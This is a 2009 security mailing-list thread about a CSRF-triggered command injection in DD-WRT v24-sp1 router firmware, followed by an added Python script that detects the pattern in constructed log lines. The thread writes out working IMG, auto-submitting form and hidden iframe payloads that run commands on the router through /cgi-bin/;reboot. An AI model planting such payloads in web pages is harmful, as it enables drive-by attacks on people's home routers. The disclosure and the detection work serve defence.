I'm glad you approve, and thanks for letting us know about the exploit via the recent podcast. I don't follow the latest vulnerabilities as well as I should.
Adrian

On Sat, Jul 25, 2009 at 8:59 PM, Carlos Perez <[email protected]> wrote:
> Only thing I can say: You ROCK!!!!! dude
>
> Sent from my iPhone
>
> On Jul 25, 2009, at 5:35 PM, Adrian Crenshaw <[email protected]> wrote:
>
> I heard Carlos talk about it, so I started to work on a writeup, which I'll
> post to my site shortly. Carlos, thanks for the idea.
>
> I was interested in giving a real world example of a CSRF attack, similar to
> the ones I mentioned in my OWASP Top 5 video
> <http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville>, and maybe
> use it against a piece of internal equipment that is behind a NAT box. Then I
> heard about Carlos Perez's write-up
> <http://www.darkoperator.com/blog/2009/7/21/using-metasploit-dd-wrt-exploit-module-thru-pivot.html>
> on using Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware.
> I thought this would be a great way to demo the concept of using CSRF/XSS
> against hardware behind a NAT, especially since I've done a video on
> installing DD-WRT before
> <http://www.irongeek.com/i.php?page=videos/intro-to-dd-wrt-mod-your-wireless-router-to-do-more>.
> Some people think it's not a big deal since the attack request has to come
> from an internal source, but they don't think about the fact that CSRF can
> make the attack come from an internal source. Granted, this may not be
> considered a true CSRF from the standpoint that you don't have to have
> authenticated against your DD-WRT v24-sp1 router, but it works much the same
> way. Carlos' demo shows using Metasploit to open a shell on the router, then
> do some other messing around; I'll just show how this vulnerability could be
> used to reboot the router just using HTML (there are far more deviant things
> you could do). For the most part this attack essentially amounts to pointing
> the browser at http://ip-of-router/cgi-bin/;some-command .
>
> Since the default IP for most home NAT routers is 192.168.1.1, this is a
> pretty easy attack that could be pulled off against people who browse a page
> that the attacker controls. The attacker would not have to explicitly have
> the victim go to http://ip-of-router/cgi-bin/;some-command to pull off the
> attack; there are plenty of ways to make a browser automatically make the
> request, for example:
>
> IMG get:
> <img src="http://192.168.1.1/cgi-bin/;reboot">
>
> Post method:
> <form name="csrfform" method="post" action="http://192.168.1.1/cgi-bin/;reboot">
>   <input type="hidden" name="input_from_form" value="Test of auto submitted form.">
> </form>
> <script>document.csrfform.submit()</script>
>
> IFRAME Get:
> <iframe src="http://192.168.1.1/cgi-bin/;reboot" style="width:0px; height:0px; border: 0px"></iframe>
>
> If you would like to test this code against your DD-WRT v24-sp1 click the
> link below:
> DD-WRT test page, only click if you want your router to reboot
> <http://www.irongeek.com/security/ddwrttest-only-click-if-you-want-your-router-to-reboot.htm>
>
> For information on the fix:
> http://www.dd-wrt.com
>
> Guess it's time to patch.
>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
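A detection-side companion to the thread above, added here as an example; it is not Adrian's or Carlos's code and not part of DD-WRT. The message describes the attack as a browser being made to request http://ip-of-router/cgi-bin/;some-command from a page the attacker controls, so the observable on the wire is a request path of the form /cgi-bin/; followed by the command, sent by a LAN host with a Referer pointing at an outside site. The script below parses constructed Apache "combined" style access-log lines (the lines, the 192.168.1.23 client and the attacker.example host are all made up for the example; DD-WRT's httpd is not assumed to write such logs, so think of a transparent proxy or LAN sensor that does), flags the injection pattern, and uses the Referer to separate cross-site (CSRF) triggers from direct ones. Decoding %3B before matching and the Referer heuristic are additions of mine, not something the message states; Referer can be absent or set arbitrarily by non-browser clients, so "direct" only means "no cross-site Referer was seen".

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Apache "combined" format, as a LAN proxy or
# sensor might record HTTP traffic to the router. Not real DD-WRT logs.
SAMPLE_LOG = """\
192.168.1.23 - - [25/Jul/2009:17:35:01 -0400] "GET /cgi-bin/;reboot HTTP/1.1" 200 0 "http://attacker.example/lolcats.htm" "Mozilla/5.0"
192.168.1.23 - - [25/Jul/2009:17:35:02 -0400] "POST /cgi-bin/;reboot HTTP/1.1" 200 0 "http://attacker.example/lolcats.htm" "Mozilla/5.0"
192.168.1.23 - - [25/Jul/2009:17:36:10 -0400] "GET /cgi-bin/%3Breboot HTTP/1.1" 200 0 "-" "curl/7.19"
192.168.1.23 - - [25/Jul/2009:17:40:00 -0400] "GET /Status_Router.asp HTTP/1.1" 200 4231 "http://192.168.1.1/index.asp" "Mozilla/5.0"
192.168.1.23 - - [25/Jul/2009:17:41:00 -0400] "GET /cgi-bin/ HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [time], "request", status,
# size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The pattern from the thread: /cgi-bin/ followed by ';' and a shell command.
INJECT_RE = re.compile(r'^/cgi-bin/;(?P<cmd>.*)$')

# Assumed address of the device being watched (the thread's default gateway).
ROUTER_HOSTS = {"192.168.1.1"}


def parse_line(line):
    """Split one combined-format line into fields, or return None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def classify(entry):
    """Return a finding for an injection attempt, or None for a benign request."""
    # Work on the path only, percent-decoded once, so %3B and ';' are treated alike.
    path = unquote(urlsplit(entry["target"]).path)
    m = INJECT_RE.match(path)
    if not m:
        return None
    referer = entry["referer"]
    ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
    if ref_host is None:
        vector = "direct"        # typed URL, script, or Referer stripped
    elif ref_host in ROUTER_HOSTS:
        vector = "same-origin"   # came from the router's own UI
    else:
        vector = "cross-site"    # CSRF: another site made the browser send it
    return {
        "src": entry["src"],
        "method": entry["method"],
        "command": m.group("cmd"),
        "vector": vector,
        "referer_host": ref_host,
    }


def scan(log_text):
    """Run every parseable line through classify() and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['src']} {f['method']} cmd={f['command']!r} via {f['vector']} "
              f"(referer host: {f['referer_host']})")
```

On the constructed input this reports three hits: the IMG/IFRAME style GET and the auto-submitted POST, both classified cross-site because the Referer names attacker.example rather than the router, and the percent-encoded curl request classified direct. The two benign lines (the status page and a bare /cgi-bin/ request with no ';') are not reported. Matching on the decoded path rather than the raw request string is the part worth copying into a real signature.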
